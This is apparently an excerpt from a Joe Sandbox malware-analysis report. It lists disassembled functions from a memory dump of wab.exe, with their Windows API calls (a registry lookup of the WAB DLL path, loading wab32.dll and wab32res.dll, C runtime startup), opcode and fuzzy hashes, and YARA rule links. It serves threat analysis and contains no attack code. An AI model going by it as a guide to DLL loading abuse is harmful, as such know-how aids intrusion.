                    • Instruction ID: 334a8654ed6623156b202db0c575cc1910c9e4cec375a52c814d76cce05c140c
                    • Opcode Fuzzy Hash: e1fdfef4ed2a74eec398db3794d09ddc1a0ec16d8ca55108d208f30d4f9be69c
                    • Instruction Fuzzy Hash: B3210471A006129FDB254E2D988C755BBE5EB00318F10A12DEA15AB2D0DB71DCC4CB90
                    Function 00E01BF4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33libraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E028A4: memset.MSVCRT ref: 00E028DE
                      • Part of subcall function 00E028A4: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 00E0290A
                      • Part of subcall function 00E028A4: RegQueryValueExW.ADVAPI32(?,00E011FC,00000000,?,?,?,?,00000000,00000000), ref: 00E0293F
                      • Part of subcall function 00E028A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 00E0295F
                      • Part of subcall function 00E028A4: RegCloseKey.ADVAPI32(?,?,00000000,00000000), ref: 00E02997
                    • PathRemoveFileSpecW.SHLWAPI(?,?), ref: 00E01C1E
                    • PathAppendW.SHLWAPI(?,wab32res.dll), ref: 00E01C34
                    • LoadLibraryW.KERNEL32(?), ref: 00E01C45
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2440184985.0000000000E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 0000000E.00000002.2440105897.0000000000E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E05000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E07000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E1D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_e00000_wab.jbxd
                    Similarity
                    • API ID: Path$AppendCloseEnvironmentExpandFileLibraryLoadOpenQueryRemoveSpecStringsValuememset
                    • String ID: wab32res.dll
                    • API String ID: 1705514897-2698570859
                    • Opcode ID: e1af125fdd7b7021f0935d5c10940b99ff671909134e553765dded44c8f00de4
                    • Instruction ID: e4faf44b7a432e34ae5351e4d5675d278bdb60ae26be524c1a3000fe814aebaf
                    • Opcode Fuzzy Hash: e1af125fdd7b7021f0935d5c10940b99ff671909134e553765dded44c8f00de4
                    • Instruction Fuzzy Hash: 15F090B5A012189BDB14EBB59C4CA9EB3FCAB04300F504194A511F7181DB30DE88CA90
                    Function 00E02F80 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E034D8: GetModuleHandleW.KERNEL32(00000000), ref: 00E034DF
                    • __set_app_type.MSVCRT ref: 00E02F92
                    • __p__fmode.MSVCRT ref: 00E02FA8
                    • __p__commode.MSVCRT ref: 00E02FB6
                    • __setusermatherr.MSVCRT ref: 00E02FD7
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2440184985.0000000000E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 0000000E.00000002.2440105897.0000000000E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E05000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E07000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E1D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_e00000_wab.jbxd
                    Similarity
                    • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                    • String ID:
                    • API String ID: 1632413811-0
                    • Opcode ID: 7b8faf6bc90c7a4223a982163beaebc27bacffcc4089ddd9f3901e29ac596689
                    • Instruction ID: 390dd0c3b070eece09f76565fe2f8c5d56e07134a4b1822a4c3a1f82b167c697
                    • Opcode Fuzzy Hash: 7b8faf6bc90c7a4223a982163beaebc27bacffcc4089ddd9f3901e29ac596689
                    • Instruction Fuzzy Hash: 03F01CF1544700CFC7286BB2AD0E20A3BE4F715322B106609E662B62F1DB3B85C8CF10
                    Function 00E01B83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00E01BA8
                      • Part of subcall function 00E028A4: memset.MSVCRT ref: 00E028DE
                      • Part of subcall function 00E028A4: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 00E0290A
                      • Part of subcall function 00E028A4: RegQueryValueExW.ADVAPI32(?,00E011FC,00000000,?,?,?,?,00000000,00000000), ref: 00E0293F
                      • Part of subcall function 00E028A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 00E0295F
                      • Part of subcall function 00E028A4: RegCloseKey.ADVAPI32(?,?,00000000,00000000), ref: 00E02997
                    • LoadLibraryW.KERNEL32(?,?,00000000), ref: 00E01BE2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2440184985.0000000000E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 0000000E.00000002.2440105897.0000000000E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E05000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E07000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 0000000E.00000002.2440324972.0000000000E1D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_e00000_wab.jbxd
                    Similarity
                    • API ID: memset$CloseEnvironmentExpandLibraryLoadOpenQueryStringsValue
                    • String ID: wab32.dll
                    • API String ID: 2792020168-2849205143
                    • Opcode ID: 4ae93f4851d29ba001fea41e7e6545e1bc9a1f8069b2db5de815a5b3176cf2e7
                    • Instruction ID: a1b5f50908999b48422f6acd4b747ea70603c43d2c3f6ce99ac600ef1e8f2d9d
                    • Opcode Fuzzy Hash: 4ae93f4851d29ba001fea41e7e6545e1bc9a1f8069b2db5de815a5b3176cf2e7
                    • Instruction Fuzzy Hash: BFF0C2758012189BCB28EB68DC4E9EA77BCDB50304FA04198A916AB1C1EA305B89CA90